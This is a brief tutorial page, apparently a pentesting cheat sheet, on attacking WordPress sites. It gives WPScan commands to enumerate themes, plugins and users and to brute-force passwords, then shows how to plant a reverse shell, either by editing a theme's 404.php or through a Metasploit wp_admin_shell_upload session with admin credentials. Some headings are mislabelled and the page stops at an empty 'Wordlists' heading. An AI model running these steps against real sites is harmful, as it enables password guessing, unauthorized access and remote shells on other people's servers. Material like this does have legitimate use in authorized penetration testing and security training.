How to Attack WordPress Website

Learn how to execute the most commons WordPress attacks from username enumeration to upaload a reverse shell into the target b0x.

Install WPscan

apt install wpscan -y

WPscan Parameters

wpscan -h

Update WPscan

wpscan --update

Enumerate WordPress using WPscan

Version

All Themes Installed

wpscan --url http://poplabsec.com -e t

Vulnerable Themes Installed

wpscan --url http://poplabsec.com -e vt

All Plugins Installed

wpscan --url http://poplabsec.com -e p

Vulnerable Themes Installed

wpscan --url http://poplabsec.com -e vp

WordPress Users

wpscan --url http://poplabsec.com -e u

Brute Force WordPress Passwords

wpscan --url http://poplabsec.com --passwords path-to-wordlist

Help with Metasploit

Upload Reverse Shell to WordPress

Upload Manually

http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

Upload using Metasploit

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

Wordlists